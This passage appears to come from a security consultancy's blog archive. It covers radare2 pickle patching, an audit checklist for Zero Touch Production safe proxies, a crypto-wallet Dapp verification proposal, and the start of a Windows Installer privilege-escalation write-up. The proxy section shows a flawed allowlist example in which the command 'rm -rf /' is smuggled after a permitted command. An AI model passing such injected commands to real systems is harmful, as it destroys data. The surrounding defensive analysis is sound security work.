            0x000005fe      8c1468747470.  short_binunicode "https://example.com/" ; 0x600
            0x00000614      94             memoize
            0x00000615      75             setitems
[0x000005fe]> r+ 1 # add one extra byte to the file, since our new URL is slightly longer
[0x000005fe]> wa short_binunicode "https://doyensec.com/"
INFO: Written 23 byte(s) (short_binunicode "https://doyensec.com/") = wx 8c1568747470733a2f2f646f79656e7365632e636f6d2f @ 0x000005fe
[0x000005fe]> pd 3     # double check we did not clobber an instruction
            ;-- pick.str_x5fe:
            0x000005fe      8c1568747470.  short_binunicode "https://doyensec.com/" ; 0x600
            0x00000615      94             memoize
            ;-- pick.what_x616:
            0x00000616      75             setitems
[0x000005fe]> pdP @0 |tail      # check that the patch worked
        str_x5e0: 30
}
what_x5f3 = g_Session_x4c.__new__(g_Session_x4c, *())
what_x5f3.__setstate__(dict_x51)
str_x5f4 = "baseurl"
str_x5fe = "https://doyensec.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x617 = g_Api_x1c.__new__(g_Api_x1c, *())
what_x617.__setstate__(dict_x21)
return what_x617

JSON and Automation

Imagine this is just the first of 100 files and you want to patch them all. Radare2 is easy to script with r2pipe. Most commands in r2 have a JSON variant by adding a j to the end. In this case, pdPj will produce an AST in JSON. This is complete with offsets. Using this you can write a parser that will automatically find the baseurl element of the returned api object, get the offset and patch it.
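
For example, here is a minimal r2pipe sketch in Python. It assumes the AST shape shown in this post (nodes are objects with offset, type and value keys) and a hypothetical filename, and it simply mirrors the manual s, r+ and wa commands from the patching section:

import r2pipe

def find_str_offset(node, needle):
    # Recursively walk the pdPj AST looking for a PY_STR node with our value
    if isinstance(node, dict):
        if node.get("type") == "PY_STR" and node.get("value") == needle:
            return node["offset"]
        node = list(node.values())
    if isinstance(node, list):
        for child in node:
            offset = find_str_offset(child, needle)
            if offset is not None:
                return offset
    return None

r2 = r2pipe.open("api.pickle", flags=["-w"])  # hypothetical filename
ast = r2.cmdj("pdPj @0")
offset = find_str_offset(ast, "https://example.com/")
if offset is not None:
    r2.cmd(f"s {offset}")
    r2.cmd("r+ 1")  # the new URL is one byte longer
    r2.cmd('wa short_binunicode "https://doyensec.com/"')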

JSON can also be helpful without r2pipe. This is because r2 has a bunch of built-in features for dealing with JSON. For example, we can pretty print JSON with ~{}, but for this pickle it would produce 1492 lines of JSON. So better yet, use r2’s internal gron output with ~{=} and grep for what you want.

[0x000005fe]> pdPj @0 ~{=}https
json.stack[0].value[1].args[0].value[0][1].value[1].args[0].value[1][1].value[1].args[0].value[0][1].value[1].args[0].value[10][1].value[0].value = "https";
json.stack[0].value[1].args[0].value[0][1].value[1].args[0].value[8][1].value[1].args[0].value = "https://";
json.stack[0].value[1].args[0].value[1][1].value = "https://doyensec.com/";

Now we can use the provided JSON path to find the offset of the doyensec.com URL.

[0x00000000]> pdPj @0 ~{stack[0].value[1].args[0].value[1][1].value}
https://doyensec.com/
[0x00000000]> pdPj @0 ~{stack[0].value[1].args[0].value[1][1]}
{"offset":1534,"type":"PY_STR","value":"https://doyensec.com/"}
[0x00000000]> pdPj @0 ~{stack[0].value[1].args[0].value[1][1].offset}
1534
[0x00000000]> s `pdPj @0 ~{stack[0].value[1].args[0].value[1][1].offset}` ## seek to address using subcommand
[0x000005fe]> pd 1
            ;-- pick.str_x5fe:
            0x000005fe      8c1568747470.  short_binunicode "https://doyensec.com/" ; 0x600

Don't forget you can pipe to external commands. For example, pdPj |jq can be used to search the AST for different patterns, such as returning all objects whose type is PY_GLOBAL.
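
For instance, assuming jq is installed, a filter like the following should list every PY_GLOBAL node together with its offset:

[0x00000000]> pdPj @0 |jq '.. | objects | select(.type? == "PY_GLOBAL")'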

Conclusion

The r2pickledec plugin simplifies the reversing of pickles. Because it is an r2 plugin, you get all the features of r2. We barely scratched the surface of what r2 can do. If you'd like to learn more, check out the r2 book. Be sure to keep an eye out for my next post, where I will go into Python pickle obfuscation techniques.

Testing Zero Touch Production Platforms and Safe Proxies

As more companies develop in-house services and tools to moderate access to production environments, the importance of understanding and testing these Zero Touch Production (ZTP) platforms grows [1][2]. This blog post aims to provide an overview of ZTP tools and services, explore their security role in DevSecOps, and outline common pitfalls to watch out for when testing them.

SRE? ZTP?

"Every change in production must be either made by automation, prevalidated by software or made via audited break-glass mechanism." – Seth Hettich, Former Production TL, Google

This terminology was popularized by Google's DevOps teams and is the gold standard to this day. In this model, there are SREs, a select group of engineers who can exclusively use their SSH production access to act when something breaks. But that access introduces reliability and security risks if they make a mistake or their accounts are compromised. To balance this risk, companies should automate the majority of production operations while providing routes for manual changes when necessary. This is the basic reasoning behind the "Zero Touch Production" pattern.

The way we all feel about SRE

Safe Proxies In Production

The "Safe Proxy" model refers to the tools that allow authorized persons to access or modify the state of physical servers, virtual machines, or particular applications. From the original definition:

At Google, we enforce this behavior by restricting the target system to accept only calls from the proxy through a configuration. This configuration specifies which application-layer remote procedure calls (RPCs) can be executed by which client roles through access control lists (ACLs). After checking the access permissions, the proxy sends the request to be executed via the RPC to the target systems. Typically, each target system has an application-layer program that receives the request and executes it directly on the system. The proxy logs all requests and commands issued by the systems it interacts with.

The safety & security roles of Safe Proxies

There are various outage scenarios prevented by ZTP (e.g., typos, cut/paste errors, wrong terminals, underestimating the blast radius of impacted machines, etc.). On paper, it's a great way to protect production from human errors affecting availability, but it can also help prevent some forms of malicious access. A typical scenario involves a compromised or malicious SRE trying to do what an attacker with those privileges would do. This could include bringing down or attacking other machines, compromising secrets, or scraping user data programmatically. This is why testing these services will become more and more important, as attackers will find them valuable and target them.

Generic scheme about Safe Proxies

What does ZTP look like today

Many companies nowadays need these secure proxy tools to realize their vision, but they are all trying to reinvent the wheel in one way or another. This is because it's an immature market with no off-the-shelf solutions. During development, the security team is often included in the steering committee, but may lack the domain-specific knowledge needed to build such solutions. Another issue is that, since the main driver is usually the DevOps team wanting operational safety, availability and integrity are prioritized at the expense of confidentiality. In reality, the ZTP framework development team should collaborate with the SRE and security teams throughout the design and implementation phases, ensuring that security and reliability best practices are woven into the fabric of the framework and not just bolted on at the end.

Last but not least, these solutions still suffer from low adoption rates and are subject to lax interpretations (to the point where developers are the ones using these systems to access what they're allowed to touch in production). These services are particularly juicy targets for both pentesters and attackers. It's not an overstatement to say that every actor compromising a box in a corporate environment should first look at these services to escalate their access.

What to look for when auditing ZTP tools/services

We compiled some of the most common issues we’ve encountered while testing ZTP implementations below:

A. Web Attack Surface

ZTP services often expose a web-based frontend for various purposes such as monitoring, proposing commands or jobs, and checking command output. These frontends are prime targets for classic web security vulnerabilities like Cross-Site Request Forgery (CSRF), Server-Side Request Forgery (SSRF), Insecure Direct Object References (IDORs), XML External Entity (XXE) attacks, and Cross-Origin Resource Sharing (CORS) misconfigurations. If the frontend is also used for command moderation, it presents an even more interesting attack surface.

B. Hooks

Webhooks are widely used in ZTP platforms due to their interaction with team members and on-call engineers. These hooks are crucial for the command approval flow ceremony and for monitoring. Attackers may try to manipulate or suppress any PagerDuty, Slack, or Microsoft Teams bot/hook notifications. Issues to look for include content spoofing, webhook authentication weaknesses, and replay attacks, as the sketch below illustrates.
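
As a quick illustration, here is a minimal Python sketch of the verification logic to look for when auditing these integrations. The names and the signing scheme are hypothetical, modeled on common shared-secret HMAC webhook designs; note how dropping the timestamp check would reintroduce replay attacks:

import hashlib
import hmac
import time

SECRET = b"shared-webhook-secret"  # hypothetical shared secret
MAX_SKEW = 300                     # reject messages older than 5 minutes

def verify_webhook(body: bytes, timestamp: str, signature: str) -> bool:
    # Reject stale messages first, otherwise captured requests can be replayed
    if abs(time.time() - int(timestamp)) > MAX_SKEW:
        return False
    expected = hmac.new(SECRET, timestamp.encode() + b"." + body,
                        hashlib.sha256).hexdigest()
    # Constant-time comparison avoids timing side channels
    return hmac.compare_digest(expected, signature)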

C. Safe Centralization

Safety checks in ZTP platforms are usually evaluated centrally. A portion of the solution is often hosted independently for availability, to evaluate the rules set by the SRE team. It’s essential to assess the security of the core service, as exploiting or polluting its visibility can affect the entire infrastructure’s availability (what if the service is down? who can access this service?).

In a hypothetical sample attack scenario, if a rule is set to only allow reboots of a certain percentage of the fleet, can an attacker pollute the fleet status and make the hosts look alive? This can be achieved with ping reply spoofing or via MITM in the case of plain HTTP health endpoints. Under these premises, network communications must be Zero Trust too, to defend against this.

D. Insecure Default Templates

The templates for the policy configuration managing access control for services are usually provided to service owners. These can be a source of errors themselves. Users should be guided to make the right choices by providing templates or automatically generated settings that are secure by default. For a full list of the design strategies presented, see the "Building Secure and Reliable Systems" bible [3].

E. Logging

Inconsistent or excessive logging retention of command outputs can be hazardous. Attackers might abuse discrepancies in logging retention to access user data or secrets logged in a given command or its results.

F. Rate-limiting

Proper rate-limiting configuration is essential to ensure an attacker cannot change all production β€œat once” by themselves. The rate limiting configuration should be agreed upon with the team responsible for the mediated services.

G. ACL Ownership

Another pitfall is found in what provides the ownership or permission logic for the services. If SREs can edit membership data via the same ZTP service or via other means, an attacker can do the same and bypass the solution entirely.

ZTP

H. Command Safeguards

Strict allowlists of parameters and configurations should be defined for commands or jobs that can be run. Similar to β€œliving off the land binaries” (lolbins), if arguments to these commands are not properly vetted, there’s an increased risk of abuse.

I. Traceability and Scoping

A reason for the pushed command must always be requested by the user (who, when, what, WHY). Ensuring traceability and scoping in the ZTP platform helps maintain a clear understanding of actions taken and their justifications.

J. Scoped Access

The ZTP platform should have rules in place to detect not only if the user is authorized to access user data, but also which kind and at what scale. Lack of fine-grained authorization or scoping rules for querying user data increases the risk of abuse.

K. Different Interfaces, Different Requirements

ZTP platforms usually have two types of proxy interfaces: Remote Procedure Call (RPC) and Command Line Interface (CLI). The RPC proxy is used to run CLI on behalf of the user/service in production in a controlled way. Since the implementation varies between the two interfaces, looking for discrepancies in the access requirements or logic is crucial.

L. Service vs Global rules

The rule evaluation priority (Global over Service-specific) is another area of concern. In general, service rules should not be able to override global rules but only set stricter requirements.

M. Command Parsing

If an allowlist is enforced, inspect how the command is parsed when an allowlist is created (abstract syntax tree (AST), regex, binary match, etc.).
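
To illustrate why the parsing method matters, consider this deliberately fragile Python sketch (the rule and command are hypothetical). The regex anchors only the beginning of the command, so anything appended after the allowed prefix still passes the check:

import re

# A deliberately fragile allowlist: no trailing anchor, no argument parsing
ALLOWED = re.compile(r"^/usr/bin/systemctl (restart|status) nginx")

def is_allowed(cmd: str) -> bool:
    return ALLOWED.match(cmd) is not None

# Passes the check, but smuggles a second command if the proxy
# later hands the string to a shell instead of an exec'd argv list
print(is_allowed("/usr/bin/systemctl restart nginx; rm -rf /"))  # True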

N. Race Conditions

All operations should be queued, and a global queue for the commands should be respected. There should be no chance of race conditions if two concurrent operations are issued.

O. Break-glass

In the ZTP pattern, a break-glass mechanism is always available for emergency response. Auditing this mode is essential. Entering it must be loud and justified, must alert the security team, and must be heavily logged. As an additional security measure, the break-glass mechanism for zero trust networking should be available only from specific locations. These locations are the organization's panic rooms: specific locations with additional physical access controls to offset the increased trust placed in their connectivity.

Conclusions

As more companies develop and adopt Zero Touch Production platforms, it is crucial to understand and test these services for security vulnerabilities. With an increase in vendors and solutions for Zero Touch Production in the coming years, researching and staying informed about these platforms’ security issues is an excellent opportunity for security professionals.

References

  1. Michał Czapiński and Rainer Wolafka from Google Switzerland, "Zero Touch Prod: Towards Safer and More Secure Production Environments". USENIX (2019). Link / Talk

  2. Ward, Rory, and Betsy Beyer. "BeyondCorp: A New Approach to Enterprise Security", (2014). Link

  3. Adkins, Heather, et al. "Building Secure and Reliable Systems: Best Practices for Designing, Implementing, and Maintaining Systems". O'Reilly Media, (2020). Link

The Case For Improving Crypto Wallet Security

Anatomy Of A Modern Day Crypto Scam

A large number of today’s crypto scams involve some sort of phishing attack, where the user is tricked into visiting a shady/malicious web site and connecting their wallet to it. The main goal is to trick the user into signing a transaction which will ultimately give the attacker control over the user’s tokens.

Usually, it all starts with a tweet or a post on some Telegram group or Slack channel, where a link is sent advertising either a new yield farming protocol boasting large APYs, or a new NFT project which just started minting. In order to interact with the web site, the user would need to connect their wallet and perform some confirmation or authorization steps.

Let's take a look at the common NFT approve scam. The user is led to the malicious NFT site, advertising a limited pre-mint of their new NFT collection. The user is then prompted to connect their wallet and sign a transaction confirming the mint. However, for some reason, the transaction fails. The same happens on the next attempt. With each failed attempt, the user becomes more and more frustrated, fearing the failures will cause them to miss out on the mint. Their concentration and focus shift from paying attention to the transactions to worrying about missing a great opportunity.

At this point, the phishing is in full swing. A few more failed attempts, and the victim bites.

Wallet Phishing

(Image borrowed from How scammers manipulate Smart Contracts to steal and how to avoid it)

The final transaction, instead of calling the mint function, calls setApprovalForAll, which will essentially give the malicious actor control over the user's tokens. By this point, the user is in a state where they blindly confirm transactions, hoping that the minting will not close.

Unfortunately, the last transaction is the one that goes through. Game over for the victim. All the attacker has to do now is act quickly and transfer the tokens away from the user’s wallet before the victim realizes what happened.

These types of attacks are really common today. A user stumbles on a link to a project offering new opportunities for profit, they connect their wallet, and they mistakenly hand over their tokens to malicious actors. While a case can be made for user education, responsibility, and researching a project before interacting with it, we believe that software also has a big part to play.

The Case For Improving Crypto Wallet Security

Nobody can deny that the introduction of blockchain-based technologies and Web3 has had a massive impact on the world. Most of these platforms offer the following common set of features:

  • transfer of funds
  • permission-less currency exchange
  • decentralized governance
  • digital collectibles

Regardless of the tech stack used to build these platforms, it's ultimately the users who make the platform. This means that users need a way to interact with their platform of choice. Today, the most user-friendly way of interacting with blockchain-based platforms is by using a crypto wallet. In simple terms, a crypto wallet is a piece of software which facilitates signing of blockchain transactions using the user's private key. There are multiple types of wallets, including software, hardware, custodial, and non-custodial. For the purposes of this post, we will focus on software-based wallets.
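
To make that definition concrete, here is a minimal Python sketch using the eth_account library. The key is a throwaway and the transaction fields are illustrative; everything else a wallet does (UI, RPC communication, key storage) is built around this one primitive:

from eth_account import Account

acct = Account.create()  # throwaway key; real wallets load an existing one

tx = {
    "to": "0x0000000000000000000000000000000000000000",
    "value": 10**15,    # 0.001 ETH, denominated in wei
    "gas": 21000,
    "gasPrice": 10**9,
    "nonce": 0,
    "chainId": 1,
}

signed = Account.sign_transaction(tx, acct.key)
# The raw, signed blob is what gets broadcast over the blockchain JSON RPC
print(signed.rawTransaction.hex())  # attribute name varies across eth_account versions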

Before continuing, let’s take a short detour to Web2. In that world, we can say that platforms (also called services, portals or servers) are primarily built using TCP/IP based technologies. In order for users to be able to interact with them, they use a user-agent, also known as a web browser. With that said, we can make the following parallel to Web3:

Technology   Communication Protocol   User-Agent
Web2         HTTP/TLS                 Web Browser
Web3         Blockchain JSON RPC      Crypto Wallet

Web browsers are arguably much, much more complex pieces of software compared to crypto wallets - and with good reason. As the Internet developed, people figured out how to put different media on it and web pages allowed for dynamic and scriptable content. Over time, advancements in HTML and CSS technologies changed what and how content could be shown on a single page. The Internet became a place where people went to socialize, find entertainment, and make purchases. Browsers needed to evolve, to support new technological advancements, which in turn increased complexity. As with all software, complexity is the enemy, and complexity is where bugs and vulnerabilities are born. Browsers needed to implement controls to help mitigate web-based vulnerabilities such as spoofing, XSS, and DNS rebinding while still helping to facilitate secure communication via encrypted TLS connections.

Next, let's see what a typical crypto wallet interaction for a normal user might look like.

The Current State Of Things In The Web3 World

Using a Web3 platform today usually means that a user is interacting with a web application (Dapp), which contains code to interact with the user’s wallet and smart contracts belonging to the platform. The steps in that communication flow generally look like:

1. Open the Dapp

In most cases, the user will navigate their web browser to a URL where the Dapp is hosted (ex. Uniswap). This will load the web page containing the Dapp’s code. Once loaded, the Dapp will try to connect to the user’s wallet.

Dapp and User Wallet

2. Authorizing The Dapp

Crypto wallets implement a few protections, such as requiring the user's authorization before a Dapp can access their accounts or request transaction signatures. This was not the case before EIP-1102. Implementing these features helped keep users anonymous, stop Dapp spam, and provide a way for the user to manage trusted and untrusted Dapp domains.

Authorizing The Dapp 1

If all the previous steps were completed successfully, the user can start using the Dapp.

When the user decides to perform an action (make a transaction, buy an NFT, stake their tokens, etc.), the user’s wallet will display a popup, asking whether the user confirms the action. The transaction parameters are generated by the Dapp and forwarded to the wallet. If confirmed, the transaction will be signed and published to the blockchain, awaiting confirmation.

Authorizing The Dapp 2

Besides the authorization popup shown when initially connecting to the Dapp, the user is not shown much additional information about the application or the platform. This ultimately burdens the user with verifying the legitimacy and trustworthiness of the Dapp and, unfortunately, this requires a degree of technical knowledge often out of reach for the majority of common users. While doing your own research (a common mantra of the Web3 world) is recommended, one misstep can lead to a significant loss of funds.

That being said, let's now take another detour to the Web2 world and see what a similar interaction looks like.

How Does The Web2 World Handle Similar Situations?

As in the previous example, we'll look at what happens when a user wants to use a Web2 application. Let's say that the user wants to check their email inbox. They'll start by navigating their browser to the email domain (ex. Gmail). In the background, the browser performs a TLS handshake, trying to establish a secure connection to Gmail's servers. This will enable an encrypted channel between the user's browser and Gmail's servers, eliminating the possibility of eavesdropping. If the handshake is successful, an encrypted connection is established and communicated to the user through the browser's UI.

Browser Lock

The secure connection is based on certificates issued for the domain the user is trying to access. A certificate contains a public key used to establish the encrypted connection. Additionally, certificates must be signed by a trusted third-party called a Certificate Authority (CA), giving the issued certificate legitimacy and guaranteeing that it belongs to the domain being accessed.

But, what happens if that is not the case? What happens when the certificate is for some reason rejected by the browser? Well, in that case a massive red warning is shown, explaining what happened to the user.

Browser Certificate Error

Such warnings are shown when a secure connection cannot be established, when the host's certificate is not trusted, or when the certificate has expired. The browser also tries to show, in a human-readable manner, as much useful information about the error as possible. At this point, it's the choice of the user whether they trust the site and want to continue interacting with it. The task of the browser is to inform the user of potential issues.

What Can Be Done?

Crypto wallets should show the user as much information as possible about the action being performed. The user should see information about the domain/Dapp they are interacting with. Details about the actual transaction's content, such as what function is being invoked and with which parameters, should be displayed in a user-readable fashion.

Comparing the two previous examples, we notice a lack of verification and information being displayed in crypto wallets today. This poses the question: what can be done? There exist a number of publicly available indicators of the health and legitimacy of a project. We believe communicating these to the user may be a good step forward in addressing this issue. Let's quickly go through them.

Proof Of Smart Contract Ownership

It is important to prove that a domain has ownership over the smart contracts with which it interacts. Currently, this mechanism doesn’t seem to exist. However, we think we have a good solution. Similarly to how Apple performs merchant domain verification, a simple JSON file or dapp_file can be used to verify ownership. The file can be stored on the root of the Dapp’s domain, on the path .well-known/dapp_file. The JSON file can contain the following information:

  • address of the smart contract the Dapp is interacting with
  • timestamp showing when the file was generated
  • signature of the content, verifying the validity of the file

At this point, a reader might ask: "How does this show ownership of the contract?". The key to that is the signature. Namely, the signature is generated using the private key of the account which deployed the contract. The transparency of the blockchain can be used to get the deployer address, which can then be used to verify the signature (similarly to how Ethereum smart contracts verify signatures on-chain).
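
A minimal Python sketch of that check follows, assuming the dapp_file signature is an EIP-191 personal_sign over the file's remaining fields. The exact scheme and field names are our illustration, not a finalized specification:

import json

from eth_account import Account
from eth_account.messages import encode_defunct

def verify_dapp_file(raw_json: str, deployer_address: str) -> bool:
    data = json.loads(raw_json)
    signature = data.pop("signature")
    # The signature covers the remaining fields, serialized deterministically
    message = encode_defunct(text=json.dumps(data, sort_keys=True))
    recovered = Account.recover_message(message, signature=signature)
    # The signer must be the account that deployed the smart contract
    return recovered.lower() == deployer_address.lower()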

This mechanism enables creating an explicit association between a smart contract and the Dapp. The association can later be used to perform additional verification.

Domain Registration Records

When a new domain is purchased or registered, a public record is created in a public registrar, indicating the domain is owned by someone and is no longer available for purchase. The domain name is used by the Domain Name System, or DNS, which translates it (ex. www.doyensec.com) to a machine-friendly IP address (ex. 34.210.62.107).

The creation date of a DNS record shows when the Dapp’s domain was initially purchased. So, if a user is trying to interact with an already long established project and runs into a domain which claims to be that project with a recently created domain registration record, it may be a signal of possible fraudulent activities.

TLS Certificates

Creation and expiration dates of TLS certificates can be viewed in a similar fashion as DNS records. However, due to the short duration of certificates issued by services such as Let’s Encrypt, there is a strong chance that visitors of the Dapp will be shown a relatively new certificate.

TLS certificates, however, can be viewed as a way of verifying a correct web site setup where the owner took additional steps to allow secure communication between the user and their application.

Smart Contract Source Code Verification Status

Published and verified source code allows for audits of the smart contract’s functionality and can allow quick identification of malicious activity.

Smart Contract Deployment Date

The smart contract's deployment date can provide additional information about the project. For example, if attackers set up a fake Uniswap web site, the likelihood of the malicious smart contract being recently deployed is high. If interacting with an already established, legitimate project, such a discrepancy should alert the user to potential malicious activity.

Smart Contract Interactions

Trustworthiness of a project can be seen as a function of the number of interactions with that project's smart contracts. A healthy project with a large user base will likely have a large number of unique interactions with the project's contracts. A small number of interactions, unique or not, suggests the opposite. While typical of a new project, it can also be an indicator of smart contracts set up to impersonate a legitimate project. Such smart contracts will not have the large user base of the original project, and thus the number of interactions with the project will be low.

Overall, a large number of unique interactions over a long period of time with a smart contract may be a powerful indicator of a project’s health and the health of its ecosystem.

Our Suggestion

While there are authorization steps implemented when a wallet is connecting to an unknown domain, we think there is space for improvement. The connection and transaction signing process can be further updated to show user-readable information about the domain/Dapp being accessed.

As a proof-of-concept, we implemented a simple web service https://github.com/doyensec/wallet-info. The service utilizes public information, such as domain registration records, TLS certificate information and data available via Etherscan’s API. The data is retrieved, validated, parsed and returned to the caller.

The service provides access to the following endpoints:

  • /host?url=<url>
  • /contract?address=<address>

The data these endpoints return can be integrated in crypto wallets at two points in the user’s interaction.

Initial Dapp Access

The /host endpoint can be used when the user is initially connecting to a Dapp. The Dapp’s URL should be passed as a parameter to the endpoint. The service will use the supplied URL to gather information about the web site and its configuration. Additionally, the service will check for the presence of the dapp_file on the site’s root and verify its signature. Once processing is finished, the service will respond with:

{
  "name": "Example Dapp",
  "timestamp": "2000-01-01T00:00:00Z",
  "domain": "app.example.com",
  "tls": true,
  "tls_issued_on": "2022-01-01T00:00:00Z",
  "tls_expires_on": "2022-01-01T00:00:00Z",
  "dns_record_created": "2012-01-01T00:00:00Z",
  "dns_record_updated": "2022-08-14T00:01:31Z",
  "dns_record_expires": "2023-08-13T00:00:00Z",
  "dapp_file": true,
  "valid_signature": true
}

This information can be shown to the user in a dialog UI element, such as:

Wallet Dialog Safe

As a concrete example, let's take a look at a fake Uniswap site that was active during the writing of this post. If a user tried to connect their wallet to the Dapp running on the site, the following information would be returned to the user:

{
  "name": null,
  "timestamp": null,
  "domain": "apply-uniswap.com",
  "tls": true,
  "tls_issued_on": "2023-02-06T22:37:19Z",
  "tls_expires_on": "2023-05-07T22:37:18Z",
  "dns_record_created": "2023-02-06T23:31:09Z",
  "dns_record_updated": "2023-02-06T23:31:10Z",
  "dns_record_expires": "2024-02-06T23:31:09Z",
  "dapp_file": false,
  "valid_signature": false
}

The missing information in the response reflects the fact that the dapp_file was not found on this domain. This information is then reflected in the UI, informing the user of potential issues with the Dapp:

Wallet Dialog Domain Unsafe

At this point, users can review the information and decide whether they feel comfortable giving the Dapp access to their wallet. Once the Dapp is authorized, this information doesn't need to be shown anymore. However, it would be beneficial to occasionally re-display this information, so that any changes in the Dapp or its domain are communicated to the user.

Making A Transaction

Transactions can be split into two groups: transactions that transfer native tokens, and transactions which are smart contract function calls. Based on the type of transaction being performed, the /contract endpoint can be used to retrieve information about the recipient of the transferred assets.

For our case, smart contract function calls are the more interesting group of transactions. The wallet can retrieve information about both the smart contract on which the function will be called, as well as the function parameter representing the recipient - for example, the spender parameter in the approve(address spender, uint256 amount) function call. This information can be retrieved on a case-by-case basis, depending on the function call being performed.

Signatures of widely used functions are available and can be implemented in the wallet as a type of allowlist or safe list. If a signature is unknown, the user should be informed about it.
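
As an illustration of this kind of check, the following Python sketch (standard library only) decodes the calldata and extracts the recipient-like parameter for display. The selector constants are the well-known 4-byte IDs of approve(address,uint256) and setApprovalForAll(address,bool):

# 4-byte selectors: first 4 bytes of keccak256 of the canonical signature
APPROVE = bytes.fromhex("095ea7b3")               # approve(address,uint256)
SET_APPROVAL_FOR_ALL = bytes.fromhex("a22cb465")  # setApprovalForAll(address,bool)

def describe_calldata(data: bytes) -> str:
    selector, args = data[:4], data[4:]
    if selector == APPROVE and len(args) >= 64:
        spender = "0x" + args[0:32][-20:].hex()  # address is right-aligned in a 32-byte word
        amount = int.from_bytes(args[32:64], "big")
        return f"approve(spender={spender}, amount={amount})"
    if selector == SET_APPROVAL_FOR_ALL and len(args) >= 64:
        operator = "0x" + args[0:32][-20:].hex()
        approved = int.from_bytes(args[32:64], "big") == 1
        return f"setApprovalForAll(operator={operator}, approved={approved})"
    return "unknown function selector, warn the user"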

Verifying the recipient gives users confidence that they are transferring tokens to, or allowing token access for, known, legitimate addresses.

An example response for a given address will look something like:

{
  "is_contract": true,
  "contract_address": "0xF4134146AF2d511Dd5EA8cDB1C4AC88C57D60404",
  "contract_deployer": "0x002362c343061fef2b99d1a8f7c6aeafe54061af",
  "contract_deployed_on": "2023-01-01T00:00:00Z",
  "contract_tx_count": 10,
  "contract_unique_tx": 5,
  "valid_signature": true,
  "verified_source": false
}

In the background, the web service will gather information about the type of address (EOA or smart contract), code verification status, address interaction information etc. All of that should be shown to the user as part of the transaction confirmation step.

Wallet Dialog  Unsafe

Links to the smart contract and any additional information can be provided here, helping users perform additional verification if they so wish.

In the case of native token transfers, the majority of the verification consists of typing in a valid to address. This is not a task that is well suited for automatic verification. For this use case, wallets provide an "address book" like functionality, which should be utilized to minimize user errors when initializing a transaction.

Conclusion

The point of this post is to highlight the shortcomings of today’s crypto wallet implementations, to present ideas, and make suggestions for how they can be improved. This field is actively being worked on. Recently, MetaMask updated their confirmation UI to display additional information, informing users of potential setApprovalForAll scams. This is a step in the right direction, but there is still a long way to go. Features like these can be built upon and augmented, to a point where users can make transactions and know, to a high level of certainty, that they are not making a mistake or being scammed.

There are also third-party groups like WalletGuard and ZenGo who have implemented verifications similar to those described in this post. These features should be standard and required for every crypto wallet, not just an additional piece of software that needs to be installed.

Like the user-agent of Web2, the web browser, user-agents of Web3 should do as much as possible to inform and protect their users.

Our implementation of the wallet-info web service is just an example of how public information can be pooled together. That information, combined with a good UI/UX design, will greatly improve the security of crypto wallets and, in turn, the security of the entire Web3 ecosystem.

Does Dapp verification completely solve the phishing/scam problem? Unfortunately, the answer is no. The proposed changes can help users distinguish between legitimate projects and potential scams, and guide them to make the right decision. Dedicated attackers, given enough time and funds, will always be able to produce a smart contract, Dapp, or web site which will look harmless using the indicators described above. This is true for both the Web2 and Web3 worlds.

Ultimately, it is up to the user to decide whether they feel comfortable giving their login credentials to a web site, or access to their crypto wallet to a Dapp. All software can do is point them in the right direction.

Windows Installer EOP (CVE-2023-21800)

TL;DR: This blog post describes the details and methodology of our research targeting the Windows Installer (MSI) installation technology. If you're only interested in the vulnerability itself, then jump right there.

Introduction

Recently, I decided to research a single common aspect of many popular Windows applications - their MSI installer packages.

Not every application is distributed this way. Some applications implement custom bootstrapping mechanisms, some are just meant to be dropped on the disk. However, in a typical enterprise environment, some form of control over the installed packages is often desired. Using the MSI packages simplifies the installation process for any number of systems and also provides additional benefits such as automatic repair, easy patching, and compatibility with GPO. A good example is Google Chrome, which is typically distributed as a standalone executable, but an enterprise package is offered on a dedicated domain.

Another interesting aspect of enterprise environments is a need for strict control over employee accounts. In particular, in a well-secured Windows environment, the rule of least privileges ensures no administrative rights are given unless there’s a really good reason. This is bad news for malware or malicious attackers who would benefit from having additional privileges at hand.

During my research, I wanted to take a look at the security of popular MSI packages and understand whether they could be used by an attacker for any malicious purposes and, in particular, to elevate local privileges.

Typical installation

It’s very common for the MSI package to require administrative rights. As a result, running a malicious installer is a straightforward game-over. I wanted to look at legitimate, properly signed MSI packages. Asking someone to type an admin password, then somehow opening elevated cmd is also an option that I chose not to address in this blog post.

Let’s quickly look at how the installer files are generated. Turns out, there are several options to generate an MSI package. Some of the most popular ones are WiX Toolset, InstallShield, and Advanced Installer. The first one is free and open-source, but requires you to write dedicated XML files. The other two offer various sets of features, rich GUI interfaces, and customer support, but require an additional license. One could look for generic vulnerabilities in those products, however, it’s really hard to address all possible variations of offered features. On the other hand, it’s exactly where the actual bugs in the installation process might be introduced.

During the installation process, new files will be created. Some existing files might also be renamed or deleted. The access rights to various securable objects may be changed. The interesting question is what would happen if unexpected access rights are present. Would the installer fail or would it attempt to edit the permission lists? Most installers will also modify Windows registry keys, drop some shortcuts here and there, and finally log certain actions in the event log, database, or plain files.

The list of actions isn’t really sealed. The MSI packages may implement the so-called custom actions which are implemented in a dedicated DLL. If this is the case, it’s very reasonable to look for interesting bugs over there.

Once we have an installer package ready and installed, we can often observe a new copy being cached in the C:\Windows\Installer directory. This is a hidden system directory where unprivileged users cannot write. The copies of the MSI packages are renamed to random names matching the following regular expression: ^[0-9a-z]{7}\.msi$. The name will be unique for every machine and even every new installation. To identify a specific package, we can look at the file properties (but it's up to the MSI creator to decide which properties are configured), search the Windows registry, or ask WMI:

$ Get-WmiObject -class Win32_Product | ? { $_.Name -like "*Chrome*" } | select IdentifyingNumber,Name

IdentifyingNumber                      Name
-----------------                      ----
{B460110D-ACBF-34F1-883C-CC985072AF9E} Google Chrome

Referring to the package via its GUID is our safest bet. However, different versions of the same product may still have different identifiers.

Assuming we’re using an unprivileged user account, is there anything interesting we can do with that knowledge?

Repair process

The built-in Windows tool called msiexec.exe is located in the System32 and SysWOW64 directories. It is used to manage MSI packages. The tool is a core component of Windows with a long history of vulnerabilities. As a side note, I also happen to have found one such issue in the past (CVE-2021-26415). The documented list of its options can be found on the MSDN page, although some additional undocumented switches are also implemented.

The flags worth highlighting are:

  • /l*vx to log any additional details and search for interesting events
  • /qn to hide any UI interactions. This is extremely useful when attempting to develop an automated exploit. On the other hand, potential errors will result in new message boxes. Until the message is accepted, the process does not continue and can be frozen in an unexpected state. We might be able to modify some existing files before the original access rights are reintroduced.

The repair options section lists flags we could use to trigger the repair actions. These actions would ensure the bad files are removed, and good files are reinstalled instead. The definition of bad is something we control, i.e., we can force the reinstallation of all files, all registry entries, or, say, only those with an invalid checksum.

Parameter Description
